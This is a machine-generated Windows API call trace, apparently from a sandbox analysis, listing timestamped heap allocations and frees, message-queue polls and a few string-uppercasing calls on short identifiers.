RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed618 [0083.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e98 [0083.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed618 | out: hHeap=0x2af0000) returned 1 [0083.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6d870 [0083.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed7f8 [0083.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed798 [0083.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6d9d8 [0083.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed708 [0083.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0083.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed708 | out: hHeap=0x2af0000) returned 1 [0083.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6d7f8 [0083.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed618 [0083.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed738 [0083.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6d6e0 [0083.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed660 [0083.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0083.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed660 | out: hHeap=0x2af0000) returned 1 [0083.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6d6b8 [0083.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed630 [0083.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0083.717] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0083.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f08 [0083.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e18 [0083.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed660 [0083.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed690 [0083.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0083.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed6a8 [0083.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0083.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e28 [0083.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6da00 [0083.717] CharUpperBuffW (in: lpsz="SSA5700E02918", cchLength=0xd | out: lpsz="SSA5700E02918") returned 0xd [0083.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6da00 | out: hHeap=0x2af0000) returned 1 [0083.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e28 | out: hHeap=0x2af0000) returned 1 [0083.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed6a8 | out: hHeap=0x2af0000) returned 1 [0083.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed690 | out: hHeap=0x2af0000) returned 1 [0083.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed660 | out: hHeap=0x2af0000) returned 1 [0083.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e18 | out: hHeap=0x2af0000) returned 1 [0083.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f08 | out: hHeap=0x2af0000) returned 1 [0083.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0083.718] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0083.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed660 [0083.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0083.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed660 | out: hHeap=0x2af0000) returned 1 [0083.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6d898 [0083.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed660 [0083.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed690 [0083.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e68 [0083.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6d8c0 [0083.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed6a8 [0083.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ef8 [0083.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed6a8 | out: hHeap=0x2af0000) returned 1 [0083.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6d780 [0083.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed6a8 [0083.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed6c0 [0083.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ed8 [0083.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed660 | out: hHeap=0x2af0000) returned 1 [0083.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6d9b0 [0083.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71df8 [0083.718] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6d9b0 | out: hHeap=0x2af0000) returned 1 [0083.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71df8 | out: hHeap=0x2af0000) returned 1 [0083.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed660 [0083.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71e28 [0083.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed708 [0083.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edaf8 [0083.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e18 [0083.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f48 [0083.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f48 | out: hHeap=0x2af0000) returned 1 [0083.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edb70 [0083.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e18 | out: hHeap=0x2af0000) returned 1 [0083.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29edb28 [0083.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6da50 [0083.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed978 [0083.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71df8 [0083.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed978 | out: hHeap=0x2af0000) returned 1 [0083.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6d910 [0083.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edb40 [0083.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edba0 [0083.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0083.719] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed8d0 [0083.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ee8 [0083.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed8d0 | out: hHeap=0x2af0000) returned 1 [0083.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6d730 [0083.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed8d0 [0083.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eda20 [0083.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f08 [0083.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6daa0 [0083.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed978 [0083.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f18 [0083.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed978 | out: hHeap=0x2af0000) returned 1 [0083.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6d7a8 [0083.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed978 [0083.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed9c0 [0083.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6d730 | out: hHeap=0x2af0000) returned 1 [0083.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ee8 | out: hHeap=0x2af0000) returned 1 [0083.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed8d0 | out: hHeap=0x2af0000) returned 1 [0083.719] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6db68 [0083.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed8d0 [0083.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e18 [0083.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eda38 [0083.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ee8 [0083.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ee8 | out: hHeap=0x2af0000) returned 1 [0083.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ee8 [0083.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eda80 [0083.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edab0 [0083.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e38 [0083.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edae0 [0083.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e38 | out: hHeap=0x2af0000) returned 1 [0083.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edae0 | out: hHeap=0x2af0000) returned 1 [0083.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edab0 | out: hHeap=0x2af0000) returned 1 [0083.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eda80 | out: hHeap=0x2af0000) returned 1 [0083.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ee8 | out: hHeap=0x2af0000) returned 1 [0083.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ee8 [0083.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ee8 | out: hHeap=0x2af0000) returned 1 [0083.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0083.720] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f58 [0083.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eda80 [0083.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edab0 [0083.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ee8 [0083.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edae0 [0083.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edd68 [0083.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f38 [0083.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edbe8 [0083.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edca8 [0083.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f98 [0083.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edc00 [0083.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f98 | out: hHeap=0x2af0000) returned 1 [0083.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edcd8 [0083.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e78 [0083.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e78 | out: hHeap=0x2af0000) returned 1 [0083.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edd08 [0083.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f48 [0083.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f48 | out: hHeap=0x2af0000) returned 1 [0083.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edd20 [0083.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e38 [0083.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edde0 [0083.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edc00 | out: hHeap=0x2af0000) returned 1 [0083.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edca8 | out: hHeap=0x2af0000) returned 1 [0083.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edcd8 | out: hHeap=0x2af0000) returned 1 [0083.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd08 | out: hHeap=0x2af0000) returned 1 [0083.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edbe8 | out: hHeap=0x2af0000) returned 1 [0083.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f38 | out: hHeap=0x2af0000) returned 1 [0083.721] lstrlenW (lpString="7C") returned 2 [0083.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd20 | out: hHeap=0x2af0000) returned 1 [0083.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e38 | out: hHeap=0x2af0000) returned 1 [0083.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edde0 | out: hHeap=0x2af0000) returned 1 [0083.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd68 | out: hHeap=0x2af0000) returned 1 [0083.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edae0 | out: hHeap=0x2af0000) returned 1 [0083.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ee8 | out: hHeap=0x2af0000) returned 1 [0083.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edae0 [0083.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eddc8 [0083.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f38 [0083.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edab0 | out: hHeap=0x2af0000) returned 1 [0083.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eda80 | out: hHeap=0x2af0000) returned 1 [0083.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f58 | out: hHeap=0x2af0000) returned 1 [0083.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eddc8 | out: hHeap=0x2af0000) returned 1 [0083.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f38 | out: hHeap=0x2af0000) returned 1 [0083.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edae0 | out: hHeap=0x2af0000) returned 1 [0083.721] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0083.721] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f48 [0083.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eda80 [0083.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f48 | out: hHeap=0x2af0000) returned 1 [0083.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edab0 [0083.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eda80 | out: hHeap=0x2af0000) returned 1 [0083.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eda80 [0083.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edab0 | out: hHeap=0x2af0000) returned 1 [0083.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0083.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edba0 | out: hHeap=0x2af0000) returned 1 [0083.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edb40 | out: hHeap=0x2af0000) returned 1 [0083.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6d910 | out: hHeap=0x2af0000) returned 1 [0083.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71df8 | out: hHeap=0x2af0000) returned 1 [0083.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6da50 | out: hHeap=0x2af0000) returned 1 [0083.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eda38 | out: hHeap=0x2af0000) returned 1 [0083.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed8d0 | out: hHeap=0x2af0000) returned 1 [0083.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e18 | out: hHeap=0x2af0000) returned 1 [0083.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6db68 | out: hHeap=0x2af0000) returned 1 [0083.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed9c0 | out: hHeap=0x2af0000) returned 1 [0083.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed978 | out: hHeap=0x2af0000) returned 1 [0083.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6d7a8 | out: hHeap=0x2af0000) returned 1 [0083.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f18 | out: hHeap=0x2af0000) returned 1 [0083.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6daa0 | out: hHeap=0x2af0000) returned 1 [0083.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edb28 | out: hHeap=0x2af0000) returned 1 [0083.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e28 | out: hHeap=0x2af0000) returned 1 [0083.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed660 | out: hHeap=0x2af0000) returned 1 [0083.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edb70 | out: hHeap=0x2af0000) returned 1 [0083.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edaf8 | out: hHeap=0x2af0000) returned 1 [0083.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed708 | out: hHeap=0x2af0000) returned 1 [0083.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ed8 | out: hHeap=0x2af0000) returned 1 [0083.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed690 | out: hHeap=0x2af0000) returned 1 [0083.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e68 | out: hHeap=0x2af0000) returned 1 [0083.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed6c0 | out: hHeap=0x2af0000) returned 1 [0083.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed660 [0083.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eda80 | out: hHeap=0x2af0000) returned 1 [0083.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed978 [0083.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed9c0 [0083.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f18 [0083.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6d910 [0083.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edb40 [0083.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f38 [0083.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edb40 | out: hHeap=0x2af0000) returned 1 [0083.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6da50 [0083.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edae0 [0083.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eda80 [0083.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e28 [0083.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed978 | out: hHeap=0x2af0000) returned 1 [0083.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6db18 [0083.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ed8 [0083.723] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6db18 | out: hHeap=0x2af0000) returned 1 [0083.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ed8 | out: hHeap=0x2af0000) returned 1 [0083.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed978 [0083.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71e38 [0083.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edaf8 [0083.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed8d0 [0083.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f48 [0083.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f58 [0083.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f58 | out: hHeap=0x2af0000) returned 1 [0083.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eda38 [0083.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f48 | out: hHeap=0x2af0000) returned 1 [0083.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29edb28 [0083.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6da78 [0083.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edab0 [0083.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71dd8 [0083.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edab0 | out: hHeap=0x2af0000) returned 1 [0083.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6d708 [0083.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edab0 [0083.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edb40 [0083.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0083.723] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edb70 [0083.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e18 [0083.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edb70 | out: hHeap=0x2af0000) returned 1 [0083.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6d7d0 [0083.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edb70 